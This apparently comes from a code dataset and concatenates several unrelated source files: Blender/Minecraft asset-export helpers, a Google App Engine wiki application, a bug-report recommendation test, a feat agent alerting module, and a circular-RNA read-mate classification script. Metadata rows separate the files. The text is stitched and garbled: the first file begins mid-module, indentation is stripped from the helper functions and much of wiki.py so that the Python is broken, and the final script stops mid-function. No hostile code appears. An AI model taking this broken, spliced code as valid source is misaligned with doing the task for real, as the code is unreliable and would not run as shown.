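#       Reporter.info("Exporting {n} meshes", n=len(meshes))
#       if not meshes:
#           Reporter.error("Nothing to export")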
def extract_safe(collection, key, mess_on_fail, *args, on_fail=Reporter.error, **wargs):
"""Ensures that the item is in the collection by reporting an error with
the specified message if not.
Calls on_fail when it fails to extract the element with the formatted message and
the keyword argument 'cause' set to the KeyError that caused it to fail
@param collection: the collection to search in
@param key: the key to search for
@param mess_on_fail: a message that will get formatted and handed to on_fail
@param on_fail: called when the key is not found in the collection as on_fail(formatted_message, cause=e)
where e is the KeyError thrown by the collection. The result of this function is returned instead
@param args: formatting arguments
@param wargs: additional formatting keyword-arguments. Can not be 'coll' or 'item', those will be
provided by default as the collection and the searched key
@returns the item in the collection for the specified key or the result of on_fail if a KeyError is
raised by collection[key]
"""
try:
return collection[key]
except KeyError as e:
return on_fail(mess_on_fail.format(*args, coll=collection, item=key, **wargs), cause=e)
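# Example (illustrative; `armature` is hypothetical): fetch a bone from a
# collection, reporting a readable error instead of a bare KeyError when it
# is missing. `coll` and `item` are filled in by extract_safe itself.
#
#   bone = extract_safe(armature.bones, 'root',
#                       "Armature {coll} is missing bone {item}")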
def to_valid_loc(assetstr):
    '''Replaces all non-Java identifier characters with '_' (UNDERSCORE) to form a valid package/class name.
    Note: currently only spaces are replaced; the full replacement is a TODO below.
    @see also http://docs.oracle.com/javase/specs/jls/se8/html/jls-3.html#jls-IdentifierChars
    '''
# TODO: replace all nonconforming characters with '_' (UNDERSCORE)
#assetstr = '_'.join(re.split(r'[[\x00-\x40\x5b-\x60]--[{pathsep}]]'.format(pathsep=os.path.sep), assetstr))
# if re.match(r'^[0-9]') is not None:
# assetstr = '_'+assetstr
# return assetstr
# ^ that requires Regex Set Operations
return assetstr.replace(' ', '_')
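# Example (illustrative): to_valid_loc('my mesh name') == 'my_mesh_name'.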
def asset_to_dir(assetstr):
"""Translates and minecraft asset string to a filesystem path. If the path is non conformant, an
error is reported
"""
if not assetstr:
Reporter.error("Asset-String can't be empty")
*resourceDomains, resourcePath = assetstr.split(':')
if not resourceDomains:
resourceDomains = ["minecraft"]
if len(resourceDomains) > 1:
Reporter.error(
"Asset-String {loc} can't contain more than one ':'".format(loc=assetstr))
domain = resourceDomains[0].lower()
path = resourcePath.lower()
if not domain or not path:
Reporter.error(
"Asset-String {loc}: Splitted string mustn't be empty".format(loc=assetstr))
return "assets/{mod}/{file}".format(mod=domain, file=path)
def openw_save(filepath, flags, *args, **wargs):
"""
Ensures that the directory for the filepath exists and creates it if
necessary. Returns a file_handle to the open stream by calling
open(filepath, flags, *args, **wargs)
"""
filepath = bpy.path.abspath(filepath)
directory = os.path.dirname(filepath)
if not os.path.exists(directory):
os.makedirs(directory)
return open(filepath, flags, *args, **wargs)
| gpl-2.0 | -32,218,441,258,716,172 | 34.990826 | 132 | 0.619169 | false |
elliotf/appenginewiki | wiki.py | 1 | 9987 | #!/usr/bin/env python
#
# Copyright 2008 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A simple Google App Engine wiki application.
The main distinguishing feature is that editing is in a WYSIWYG editor
rather than a text editor with special syntax. This application uses
google.appengine.api.datastore to access the datastore. This is a
lower-level API on which google.appengine.ext.db depends.
"""
#__author__ = 'Bret Taylor'
__author__ = 'Elliot Foster'
import cgi
import datetime
import os
import re
import sys
import urllib
import urlparse
import logging
import wikimarkup
from google.appengine.api import datastore
from google.appengine.api import datastore_types
from google.appengine.api import users
from google.appengine.ext import webapp
from google.appengine.ext.webapp import template
from google.appengine.ext.webapp.util import run_wsgi_app
# for Data::Dumper-like stuff
#import pprint
#pp = pprint.PrettyPrinter(indent=4)
#lib_path = os.path.join(os.path.dirname(__file__), 'lib')
#sys.path.append(lib_path)
_DEBUG = True
class BaseRequestHandler(webapp.RequestHandler):
def generate(self, template_name, template_values={}):
values = {
'request': self.request,
'user': users.get_current_user(),
'login_url': users.create_login_url(self.request.uri),
'logout_url': users.create_logout_url(self.request.uri),
'application_name': 'lilwiki',
}
values.update(template_values)
directory = os.path.dirname(__file__)
path = os.path.join(directory, os.path.join('templates', template_name))
self.response.out.write(template.render(path, values, debug=_DEBUG))
def head(self, *args):
pass
def get(self, *args):
pass
def post(self, *args):
pass
class MainPageHandler(BaseRequestHandler):
def get(self):
        user = users.get_current_user()
if not user:
self.redirect(users.create_login_url(self.request.uri))
return
query = datastore.Query('Page')
query['owner'] = user
query.Order(('modified', datastore.Query.DESCENDING))
page_list = []
for entity in query.Get(100):
page_list.append(Page(entity['name'], entity))
self.generate('index.html', {
'pages': page_list,
})
class PageRequestHandler(BaseRequestHandler):
def get(self, page_name):
# if we don't have a user, we won't know which namespace to use (for now)
user = users.get_current_user()
if not user:
self.redirect(users.create_login_url(self.request.uri))
page_name = urllib.unquote(page_name)
page = Page.load(page_name, user)
modes = ['view', 'edit']
mode = self.request.get('mode')
if not page.entity:
logging.debug('page "' + page_name + '" not found, creating new instance.')
mode = 'edit'
if not mode in modes:
logging.debug('defaulting mode to view')
mode = 'view'
self.generate(mode + '.html', {
'page': page,
})
def post(self, page_name):
user = users.get_current_user()
if not user:
self.redirect(users.create_login_url(self.request.uri))
return
page_name = urllib.unquote(page_name)
page = Page.load(page_name, user)
page.content = self.request.get('content')
page.save()
self.redirect(page.view_url())
class Page(object):
""" A wiki page, has attributes:
name
content
owner
is_public -- implement later
"""
def __init__(self, name, entity=None):
self.name = name
self.entity = entity
if entity:
self.content = entity['content']
self.owner = entity['owner']
self.modified = entity['modified']
else:
self.content = '= ' + self.name + " =\n\nStarting writing about " + self.name + ' here.'
def edit_url(self):
return '/%s?mode=edit' % (urllib.quote(self.name))
def view_url(self):
name = self.name
name = urllib.quote(name)
return '/' + name
def save(self):
if self.entity:
entity = self.entity
logging.debug('saving existing page ' + self.name)
else:
logging.debug('saving new page ' + self.name)
entity = datastore.Entity('Page')
entity['owner'] = users.get_current_user()
entity['name'] = self.name
entity['content'] = datastore_types.Text(self.content)
entity['modified'] = datetime.datetime.now()
datastore.Put(entity)
def wikified_content(self):
# TODO: check memcache for rendered page?
# replacements here
transforms = [
AutoLink(),
WikiWords(),
HideReferers(),
]
content = self.content
content = wikimarkup.parse(content)
for transform in transforms:
content = transform.run(content, self)
return content
@staticmethod
def load(name, owner):
if not owner:
owner = users.get_current_user()
query = datastore.Query('Page')
query['name'] = name
query['owner'] = owner
entities = query.Get(1)
if len(entities) < 1:
return Page(name)
else:
return Page(name, entities[0])
@staticmethod
def exists(name, owner):
logging.debug('looking up ' + name)
if not owner:
logging.debug('Were not given a user when looking up ' + name)
owner = users.get_current_user()
return Page.load(name, owner).entity
class Transform(object):
"""Abstraction for a regular expression transform.
Transform subclasses have two properties:
regexp: the regular expression defining what will be replaced
replace(MatchObject): returns a string replacement for a regexp match
We iterate over all matches for that regular expression, calling replace()
on the match to determine what text should replace the matched text.
The Transform class is more expressive than regular expression replacement
because the replace() method can execute arbitrary code to, e.g., look
up a WikiWord to see if the page exists before determining if the WikiWord
should be a link.
"""
def run(self, content, page):
"""Runs this transform over the given content.
Args:
content: The string data to apply a transformation to.
Returns:
A new string that is the result of this transform.
"""
self.page = page
parts = []
offset = 0
for match in self.regexp.finditer(content):
parts.append(content[offset:match.start(0)])
parts.append(self.replace(match))
offset = match.end(0)
parts.append(content[offset:])
return ''.join(parts)
class WikiWords(Transform):
"""Translates WikiWords to links.
"""
def __init__(self):
self.regexp = re.compile(r'(?<![A-Za-z])[A-Z][a-z]*([A-Z][a-z]+/?)+(?P<link_close>[^<]*</[Aa]>)?')
def replace(self, match):
wikiword = match.group(0)
if (match.group('link_close')):
# we're inside a link element, so don't rewrite
return wikiword
if wikiword == self.page.name:
# don't link to the current page
return wikiword
if Page.exists(wikiword, self.page.owner):
# link to that page
return '<a class="wikiword" href="/%s">%s</a>' % (wikiword, wikiword)
else:
# link to that page, making it clear it does not exist.
return '<a class="wikiword missing" href="/%s">%s?</a>' % (wikiword, wikiword)
class AutoLink(Transform):
"""A transform that auto-links URLs."""
def __init__(self):
self.regexp = re.compile(r'([^"])\b((http|https)://[^ \t\n\r<>\(\)&"]+' \
r'[^ \t\n\r<>\(\)&"\.])')
def replace(self, match):
url = match.group(2)
return match.group(1) + '<a class="autourl" href="%s">%s</a>' % (url, url)
class HideReferers(Transform):
"""A transform that hides referers for external hyperlinks."""
def __init__(self):
self.regexp = re.compile(r'href="(http[^"]+)"')
def replace(self, match):
url = match.group(1)
scheme, host, path, parameters, query, fragment = urlparse.urlparse(url)
url = 'http://www.google.com/url?sa=D&q=' + urllib.quote(url)
return 'href="%s"' % (url,)
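# Illustrative sketch (not part of the original application): a custom
# Transform only needs a `regexp` and a `replace(match)` method. For example,
# one that turns bare issue references such as "#123" into tracker links:
#
#   class IssueLinks(Transform):
#       def __init__(self):
#           self.regexp = re.compile(r'#(\d+)')
#
#       def replace(self, match):
#           return '<a href="/issues/%s">#%s</a>' % (match.group(1),
#                                                    match.group(1))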
def main():
logging.getLogger().setLevel(logging.DEBUG)
application = webapp.WSGIApplication(
#[('/', MainPageHandler)],
[
('/', MainPageHandler),
('/(.*)', PageRequestHandler),
],
debug=_DEBUG,
)
run_wsgi_app(application)
if __name__ == '__main__':
main()
"""
# Models
class Owner(db.Model):
user = db.UserProperty(required=True)
namespace = db.TextProperty()
class Page(db.Model):
owner = db.UserProperty(required=True)
name = db.StringProperty(required=True)
content = db.StringProperty()
is_public = db.BooleanProperty(default=False)
def load(name):
query = Page.gql("WHERE owner = :owner AND name = :name", owner=users.get_current_user(), name=name)
return query.fetch
"""
| lgpl-2.1 | 6,221,738,379,135,605,000 | 29.448171 | 108 | 0.608892 | false |
marquesarthur/BugAnalysisRecommender | patterny/tests/test_patterny_recommendations.py | 1 | 12679 | from __future__ import division
import json
import os
import pickle
import pprint
from random import shuffle
import numpy
import patterny.semafor.frame as _frame
from patterny.db import dao
from patterny.config import Config
from patterny.ml.similarity import ProblemSimilarity
from patterny.semafor.adapter import SemaforClient
from test_main import PatternyTest
from utils import SCRIPT_FOLDER, KDE_DATASET
from patterny.ml.tmodel import TopicModel
from patterny.analysis.summary import ProblemAnalysisTextRankSummary
from patterny.analysis.analyzer import BugAnalyses
ids_xapian_search = [
122437, 152671, 158633,
209415, 244091, 255384,
256397, 277464, 103266,
112958
]
ids_plasma_end_of_life = [
243827, 186430, 343403,
194763, 255624, 310708,
251472, 300577, 275449,
285000, 320085, 272742,
311833, 63804, 63808,
314642
]
ids_install_valgrind = [
356321, 349053, 326601,
331159, 319865, 330782,
344376, 325350
]
ids_multiple_screens = [
341674, 343369, 340267,
343772, 344671, 310168
]
ids_indexing = [
222494, 269260, 205126, 164308
]
class TestProblemAnalysis(PatternyTest):
def setup(self):
self.pp = pprint.PrettyPrinter(indent=2)
self.base_url = 'https://bugs.kde.org/show_bug.cgi?id={}'
with open(KDE_DATASET) as f:
self.config = Config(f)
self.client = SemaforClient(self.config)
def teardown(self):
pass
@staticmethod
def randomize(bugs):
result = []
index_shuf = range(len(bugs))
shuffle(index_shuf)
for idx in index_shuf:
result.append(bugs[idx])
return result
@staticmethod
def X_y(bugs, i):
test = list(bugs[i])
train = []
for j in xrange(0, len(bugs)):
if j != i:
train += bugs[j]
return train, test
def test_script(self):
# Uncomment if you want to rebuild the bugs' summaries
# bug_analyses_file = os.path.join(SCRIPT_FOLDER, 'bug_analysis_summarization.sav')
# pa_summary = ProblemAnalysisTextRankSummary(self.config)
# pa_summary.run(filter_empty_summaries=True)
# bug_analyses = BugAnalyses(pa_summary.bugs)
# pickle.dump(bug_analyses, open(bug_analyses_file, 'wb'))
# n_topics = 10
# n_top_words = 25
# n_samples = 50
# n_features = 150
# iterations = 100
n_topics = 50 # should be 100
n_top_words = 25
n_samples = None
n_features = 1500
iterations = 500
bug_analyses_file = os.path.join(SCRIPT_FOLDER, 'bug_analysis_summarization.sav')
bug_analyses = pickle.load(open(bug_analyses_file, 'rb'))
# TODO: look how to work with this guy later on
semafor_frames_file = os.path.join(SCRIPT_FOLDER, 'semafor_new_analysis.json')
with open(semafor_frames_file, 'rb') as data:
bug_semafor_map = json.load(data)
#
# bug_analyses_file = os.path.join(SCRIPT_FOLDER, 'bug_analysis_new_summarization.sav')
# bug_analyses = pickle.load(open(bug_analyses_file, 'rb'))
#
# similar_bug_analysis_file = os.path.join(SCRIPT_FOLDER, 'similar_bug_analysis_revised.json')
# with open(similar_bug_analysis_file, 'rb') as data:
# similar_bug_analysis = json.load(data)
#
# random_bug_file = os.path.join(SCRIPT_FOLDER, 'random_bug_list.sav')
# bugs = pickle.load(open(random_bug_file, 'rb'))
max_k = 10
bug_ids = bug_analyses.ids
keys = ['ids_xapian_search', 'ids_plasma_end_of_life', 'ids_install_valgrind',
'ids_multiple_screens', 'ids_indexing']
# keys = ['ids_plasma_end_of_life', 'ids_install_valgrind',
# 'ids_multiple_screens', 'ids_indexing']
keys = ['ids_xapian_search']
for i, key in enumerate(keys):
print key
exclude_ids = self.exclude(key)
X_summarized_bugs = bug_analyses.filter([bug for bug in bug_ids if bug not in exclude_ids])
y_summarized_bugs = bug_analyses.filter([bug for bug in bug_ids if bug in exclude_ids])
tmodel = TopicModel(n_samples=n_samples, n_features=n_features, n_topics=n_topics, iterations=iterations,
n_top_words=n_top_words, threshold=0.3)
tmodel.build(X_summarized_bugs.analyses, debug=True, analyses=bug_analyses)
model = ProblemSimilarity()
model.build(X_summarized_bugs)
# TODO: tmodel and check the topic of each one of the ids
j_precision = []
for j in xrange(0, len(y_summarized_bugs.ids)):
print 'Processing :: p{}'.format(j)
try:
bug_id = y_summarized_bugs.ids[j]
problem = y_summarized_bugs.problems[j]
analysis = y_summarized_bugs.analyses[j]
analysis_sentences = y_summarized_bugs.analyses_sentences[j]
recommended_similar_bugs = model.similarity(bug_id, problem, threshold=0.2)
if recommended_similar_bugs and len(recommended_similar_bugs) > max_k:
recommended_similar_bugs = recommended_similar_bugs[0:max_k]
topics_for_similar_bugs = tmodel.topics_of(
[s['id'] for s in recommended_similar_bugs]
)
top_topics = self.find_top_topics(topics_for_similar_bugs, recommended_similar_bugs)
if top_topics:
self.metrics_for(
bug_id, analysis, analysis_sentences, j_precision,
top_topics, tmodel, bug_semafor_map, recommended_similar_bugs
)
except Exception as ex:
print '>> Error on :: p{} :: {}'.format(j, ex.message)
print '\n\nDone evaluating {}'.format(key)
if j_precision:
precision = numpy.average(j_precision)
print '>> {:4.4f}'.format(precision)
print 'done'
def metrics_for(self, bug_id, analysis, analysis_sentences, j_precision, top_topics, tmodel, bug_semafor_map, recommended_similar_bugs):
t = next(iter(top_topics))
if t['topic'] in tmodel.topics:
t_ids = tmodel.topics[t['topic']].ids
t_analyses = tmodel.topics[t['topic']].analyses
t_analyses_sentences = tmodel.topics[t['topic']].analyses_sentences
_frames, _ids, _sentences = self.sentence_semantic_roles(
bug_semafor_map, t_analyses_sentences, t_ids
)
data = _frame.dataframe(_sentences, _frames, ids=_ids)
topic_synthesized_analysis = _frame.synthesize(data)
recommended = self.extract_recommended_analysis(topic_synthesized_analysis, recommended_similar_bugs)
_aux_precision = self.precision_of(bug_id, analysis, analysis_sentences, recommended, bug_semafor_map)
print _aux_precision
j_precision.append(_aux_precision)
def sentence_semantic_roles(self, bug_semafor_map, t_analyses_sentences, t_ids):
_sentences = []
_frames = []
_ids = []
for w, _id in enumerate(t_ids):
if str(str(_id)) in bug_semafor_map:
semafor_frame = bug_semafor_map[str(_id)]
current_frames = semafor_frame['frames']
if current_frames:
partial_frames = [_frame.parse(frame) for frame in current_frames]
_frames += partial_frames
_sentences += t_analyses_sentences[w]
_ids += [_id for _ in xrange(0, len(partial_frames))]
return _frames, _ids, _sentences
@staticmethod
def extract_recommended_analysis(topic_synthesized_analysis, recommended_similar_bugs):
result = []
bug_ids = [sb['id'] for sb in recommended_similar_bugs]
for synthesized_analysis in topic_synthesized_analysis:
if synthesized_analysis.contains_any(bug_ids):
result.append(synthesized_analysis)
return result
@staticmethod
def exclude(sample):
# 15
if sample == 'ids_xapian_search':
return [277464]
elif sample == 'ids_plasma_end_of_life':
return [194763, 251472, 285000, 63804, 314642]
# return [63804, 314642]
elif sample == 'ids_install_valgrind':
return [356321, 331159, 344376]
elif sample == 'ids_multiple_screens':
return [341674, 343772, 310168]
elif sample == 'ids_indexing':
return [222494, 205126]
else:
return []
@staticmethod
def similar_bugs(sample):
if sample == 'ids_xapian_search':
return ids_xapian_search
elif sample == 'ids_plasma_end_of_life':
return ids_plasma_end_of_life
elif sample == 'ids_install_valgrind':
return ids_install_valgrind
elif sample == 'ids_multiple_screens':
return ids_multiple_screens
elif sample == 'ids_indexing':
return ids_multiple_screens
else:
return []
@staticmethod
def find_top_topics(topics_for_similar_bugs, recommended_similar_bugs, k=5):
result = []
len_similar_bugs = len(recommended_similar_bugs)
if len_similar_bugs <= 1:
return None
topic_count = {}
for bug, topics in topics_for_similar_bugs.iteritems():
for topic_id in topics:
if topic_id not in topic_count:
topic_count[topic_id] = dict(count=0, prob=1)
topic_count[topic_id]['count'] += 1
current_prob = list(
map(lambda i: i['prob'],
list(
filter(lambda j: j['id'] == bug, recommended_similar_bugs))
)
)
if current_prob:
topic_count[topic_id]['prob'] *= next(iter(current_prob))
for topic, data in topic_count.iteritems():
result.append(dict(topic=topic, count=data['count'], prob=data['prob']))
if result:
            # use a distinct lambda variable so the `k` parameter (top-k) is not shadowed
            result = sorted(result, key=lambda entry: (entry['count'], entry['prob']), reverse=True)
top = next(iter(result))
if top['count'] == len_similar_bugs:
return [top]
elif len(result) >= 2:
itr = iter(result)
first_topic = next(itr)
second_topic = next(itr)
if first_topic['count'] == 1 and first_topic['count'] == second_topic['count']:
return None
else:
if k > len(result):
k = len(result)
return result[:k]
return None
@staticmethod
def _parse_tokens(data):
if 'tokens' in data:
# https://stackoverflow.com/questions/17683062/join-string-before-between-and-after
lst = [entry.encode('utf-8') for entry in data['tokens']]
return '{}{}'.format(' '.join(lst[:len(lst) - 1]), lst[-1])
return []
@staticmethod
def precision_of(bug_id, analysis, analysis_sentences, recommended, bug_semafor_map):
if str(bug_id) in bug_semafor_map:
semafor_frame = bug_semafor_map[str(bug_id)]
current_frames = semafor_frame['frames']
if current_frames:
frames = [_frame.parse(frame) for frame in current_frames]
bug_ids = []
bugs_with_similar_analyses = {}
for recommended_analysis in recommended:
bug_ids += recommended_analysis.bug_ids()
for id in bug_ids:
if id not in bugs_with_similar_analyses:
bugs_with_similar_analyses[id] = False
for recommended_analysis in recommended:
if recommended_analysis.similar_to(analysis_sentences, frames):
tp_ids = recommended_analysis.bug_ids()
for id in tp_ids:
bugs_with_similar_analyses[id] = True
tp = len(list(filter(lambda b: b is True, bugs_with_similar_analyses.values())))
total = len(bugs_with_similar_analyses.values())
result = tp / total
return result
return 0
| mit | 3,968,112,408,277,157,400 | 34.917847 | 140 | 0.56566 | false |
f3at/feat | src/feat/agents/base/alert.py | 1 | 7462 | # F3AT - Flumotion Asynchronous Autonomous Agent Toolkit
# Copyright (C) 2010,2011 Flumotion Services, S.A.
# All rights reserved.
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
# See "LICENSE.GPL" in the source distribution for more information.
# Headers in this file shall remain intact.
# -*- Mode: Python -*-
# vi:si:et:sw=4:sts=4:ts=4
from zope.interface import implements
from feat.agents.base import replay, poster, contractor
from feat.agencies import recipient, message
from feat.common import serialization, annotate, container, formatable
from feat.agents.application import feat
from feat.interface.alert import IAlertFactory, Severity, IAlert
from feat.interface.protocols import InterestType
def may_raise(factory):
annotate.injectClassCallback("alert", 3, "_register_alert_factory",
factory)
@feat.register_restorator
class AlertingAgentEntry(formatable.Formatable):
'''
Represents internal state of the alerts the agent is responsible for.
'''
formatable.field('hostname', None)
formatable.field('agent_id', None)
formatable.field('alerts', []) #[IAlertFactory]
formatable.field('statuses', dict()) # name -> (count, info, severity)
class AlertsDiscoveryContractor(contractor.BaseContractor):
protocol_id = 'discover-alerts'
interest_type = InterestType.public
@replay.journaled
def announced(self, state, announcement):
payload = AlertingAgentEntry(
hostname=state.agent.get_hostname(),
agent_id=state.agent.get_agent_id(),
alerts=state.agent.get_alert_factories().values(),
statuses=state.agent.get_alert_statuses())
state.medium.bid(message.Bid(payload=payload))
class MetaAlert(type(serialization.Serializable)):
implements(IAlertFactory)
class BaseAlert(serialization.Serializable):
__metaclass__ = MetaAlert
implements(IAlert)
name = None
description = None
persistent = False
def __init__(self, hostname, agent_id, status_info=None,
severity=Severity.warn):
if not isinstance(severity, Severity):
raise TypeError(severity)
self.name = type(self).name
self.severity = severity
self.hostname = hostname
self.agent_id = agent_id
self.status_info = status_info
assert self.name is not None, \
"Class %r should have name attribute set" % (type(self), )
@feat.register_restorator
class DynamicAlert(formatable.Formatable):
implements(IAlert, IAlertFactory)
formatable.field('name', None)
formatable.field('severity', None)
formatable.field('hostname', None)
formatable.field('status_info', None)
formatable.field('agent_id', None)
formatable.field('description', None)
formatable.field('persistent', False)
def __call__(self, hostname, agent_id, status_info,
severity=Severity.warn):
assert self.name is not None, \
"DynamicAlert %r should have name attribute set" % (self, )
if not isinstance(severity, Severity):
raise TypeError(severity)
return type(self)(
name=self.name,
severity=severity,
description=self.description,
persistent=self.persistent,
hostname=hostname,
agent_id=agent_id,
status_info=status_info)
class AgentMixin(object):
_alert_factories = container.MroDict("_mro_alert_factories")
### anotations ###
@classmethod
def _register_alert_factory(cls, factory):
f = IAlertFactory(factory)
cls._alert_factories[f.name] = f
### public ###
@replay.mutable
def initiate(self, state):
state.medium.register_interest(AlertsDiscoveryContractor)
recp = recipient.Broadcast(AlertPoster.protocol_id,
self.get_shard_id())
state.alerter = self.initiate_protocol(AlertPoster, recp)
# service_name -> IAlertFactory
state.alert_factories = dict(type(self)._alert_factories)
# name -> (count, status_info)
state.alert_statuses = dict()
@replay.mutable
def raise_alert(self, state, service_name, status_info=None,
severity=Severity.warn):
if service_name in state.alert_statuses:
count = state.alert_statuses[service_name][0] + 1
old_severity = state.alert_statuses[service_name][2]
if old_severity is None:
old_severity = severity
else:
count = 1
old_severity = severity
        # re-raising an alert can only escalate its severity (warn -> critical),
        # never lower it
severity = max([old_severity, severity])
state.alert_statuses[service_name] = (count, status_info, severity)
alert = self._generate_alert(service_name, status_info,
severity=severity)
state.alerter.notify('raised', alert)
@replay.mutable
def resolve_alert(self, state, service_name, status_info=None):
alert = self._generate_alert(service_name, status_info,
severity=Severity.ok)
state.alerter.notify('resolved', alert)
state.alert_statuses[service_name] = (0, status_info, Severity.ok)
@replay.mutable
def may_raise_alert(self, state, factory):
f = IAlertFactory(factory)
state.alert_factories[factory.name] = f
### private ###
@replay.mutable
def _fix_alert_poster(self, state, shard):
        '''
        Called after the agent has switched shards. The alert poster needs an
        update in this case, because otherwise it keeps posting to the lobby
        exchange instead of the shard exchange.
        '''
recp = recipient.Broadcast(AlertPoster.protocol_id, shard)
state.alerter.update_recipients(recp)
@replay.immutable
def _generate_alert(self, state, service_name, status_info,
severity):
alert_factory = state.alert_factories.get(service_name, None)
assert alert_factory is not None, \
"Unknown service name %r" % (service_name, )
return alert_factory(hostname=state.medium.get_hostname(),
status_info=status_info,
severity=severity,
agent_id=self.get_agent_id())
### used by discovery contractor ###
@replay.immutable
def get_alert_factories(self, state):
return state.alert_factories
@replay.immutable
def get_alert_statuses(self, state):
return state.alert_statuses
class AlertPoster(poster.BasePoster):
protocol_id = 'alert'
def pack_payload(self, action, alert):
return action, alert
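# Illustrative sketch (not part of the original module): how an agent could
# declare an alert type and raise/resolve it. 'DiskAlert', 'ExampleAgent' and
# the service name 'disk-usage' are hypothetical examples.
#
#     class DiskAlert(BaseAlert):
#         name = 'disk-usage'
#         description = 'Disk usage is above the configured threshold'
#
#     class ExampleAgent(AgentMixin, ...):   # mixed into a real agent class
#         may_raise(DiskAlert)               # registers the factory (annotation)
#
#     # later, inside a replayable method of the agent:
#     #   self.raise_alert('disk-usage', 'usage at 95%', Severity.critical)
#     #   self.resolve_alert('disk-usage')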
| gpl-2.0 | -4,525,965,524,705,380,000 | 32.918182 | 77 | 0.649022 | false |
dieterich-lab/FUCHS | GCB_testset/FUCHS/get_mate_information.py | 1 | 5784 | # script to identify circles where both mates map over the junction
import pysam
import os
import argparse
import pybedtools
import tempfile
parser = argparse.ArgumentParser(description='Extracts mate information and identify singe and double breakpoint fragments')
# input
parser.add_argument('bamfolder', metavar = 'PATH', help = 'path to folder containing circle bamfiles' )
parser.add_argument('outfile', metavar = 'outfile', help = 'path and filename to write the output to' )
parser.add_argument('-a', dest = 'bedfile' ,default = 'none', help = 'if specified, the program will try to infer the circle length without internal introns')
parser.add_argument('-p', dest = 'ref_platform', default = 'refseq', help = 'specifies the annotation platform which was used (refseq or ensembl)')
parser.add_argument('-s', dest = 'split_character', default = '_', help = 'specifies the separator within the name column in bedfile')
parser.add_argument('--tmp', dest = 'tmp_folder', default = '.', help = 'tempfolder to store tempfiles generated by pybedtools.')
args = parser.parse_args()
# parse arguments
bamfolder = args.bamfolder
outfile = args.outfile
bedfile = args.bedfile
platform = args.ref_platform
split_character = args.split_character
tmp_folder = args.tmp_folder
# define functions
def get_reads_from_bamfile(bamfile, circle_coordinates):
mates = {}
non_junction_fragments = []
circle = pysam.AlignmentFile(bamfile, "rb")
for lola in circle:
name = lola.query_name
reverse = lola.is_reverse
start = lola.reference_start
end = lola.reference_end
if not name in mates:
mates[name] = {'forward' : {'start' : [], 'end' : []}, 'reverse' : {'start' : [], 'end' : []} }
if reverse and end == circle_coordinates[2]:
mates[name]['reverse']['end'] += [start]
elif reverse and start == circle_coordinates[1] - 1:
mates[name]['reverse']['start'] += [end]
elif end == circle_coordinates[2] and not reverse:
mates[name]['forward']['end'] += [start]
elif start == circle_coordinates[1] - 1 and not reverse:
mates[name]['forward']['start'] += [end]
else:
non_junction_fragments += [lola]
circle.close()
return(mates, non_junction_fragments)
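# For reference, the mates dictionary built above maps each read name to the
# coordinates of fragments anchored at the circle start/end; values below are
# hypothetical:
#
#     {'read1': {'forward': {'start': [305], 'end': []},
#                'reverse': {'start': [], 'end': [278]}}}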
def classify_reads(mates):
for lola in mates:
strands = 0
for strand in mates[lola]:
if len(mates[lola][strand]['start']) == 1 and len(mates[lola][strand]['end']) == 1:
strands += 1
if strands == 1:
mates[lola]['status'] = 'single'
elif strands == 2:
mates[lola]['status'] = 'double'
else:
mates[lola]['status'] = 'undefined'
return(mates)
def get_statistics(mates):
stats = {'single': 0, 'double': 0, 'undefined': 0}
for lola in mates:
stats[mates[lola]['status']] += 1
return(stats)
def annotate_circle(circle_coordinates, bedfile, platform, split_character):
circle = pybedtools.BedTool('%s %s %s' %(circle_coordinates[0], circle_coordinates[1], circle_coordinates[2]), from_string=True)
exons = pybedtools.example_bedtool(bedfile)
features = exons.intersect(circle)
lengths = {}
for lola in features:
if platform == 'refseq':
transcript_name = split_character.join(lola[3].split(split_character)[0:2])
elif platform == 'ensembl':
transcript_name = lola[3].split(split_character)[0]
else:
transcript_name = 'NA'
            print('you are using an unknown reference platform. Please choose between refseq or ensembl')
length = int(lola[2]) - int(lola[1])
if not transcript_name in lengths:
lengths[transcript_name] = 0
lengths[transcript_name] += length
return(lengths)
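# The returned dict maps transcript names to the summed exonic length inside
# the circle, e.g. (hypothetical refseq-style names):
#
#     {'NM_000546': 523, 'NR_027676': 498}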
def iterate_over_folder(inputfolder, bedfile, platform, split_character):
results = {}
files = os.listdir(inputfolder)
for lola in files:
if lola.split('.')[-1] == 'bam':
print(lola)
circle_coordinates = ['_'.join(lola.split('_')[0:-3]), int(lola.split('_')[-3]), int(lola.split('_')[-2])]
            num_reads = int(lola.split('_')[-1].split('.')[0].replace('reads', ''))
MATES, FRAGMENTS = get_reads_from_bamfile('%s/%s' %(inputfolder, lola), circle_coordinates)
MATES = classify_reads(MATES)
if not bedfile == 'none':
LENGTH = annotate_circle(circle_coordinates, bedfile, platform, split_character)
else:
LENGTH = {}
STATS = get_statistics(MATES)
results[lola.split('.')[0]] = STATS
if len(LENGTH) > 0:
results[lola.split('.')[0]]['min_length'] = min(LENGTH.items(), key=lambda x: x[1])[1]
results[lola.split('.')[0]]['max_length'] = max(LENGTH.items(), key=lambda x: x[1])[1]
results[lola.split('.')[0]]['transcript_ids'] = ','.join(LENGTH.keys())
else:
results[lola.split('.')[0]]['min_length'] = circle_coordinates[2] - circle_coordinates[1]
results[lola.split('.')[0]]['max_length'] = circle_coordinates[2] - circle_coordinates[1]
results[lola.split('.')[0]]['transcript_ids'] = 'not_annotated'
results[lola.split('.')[0]]['circle_id'] = '%s_%s_%s' %(circle_coordinates[0], circle_coordinates[1], circle_coordinates[2])
results[lola.split('.')[0]]['num_reads'] = num_reads
return(results)
def write_results(results, outfile):
O = open(outfile, 'w')
O.write('circle_id\ttranscript_ids\tnum_reads\tmin_length\tmax_length\tsingle\tdouble\tundefined\n') # eventually add gene name and length also with exons
circles = sorted(results.keys())
for lola in circles:
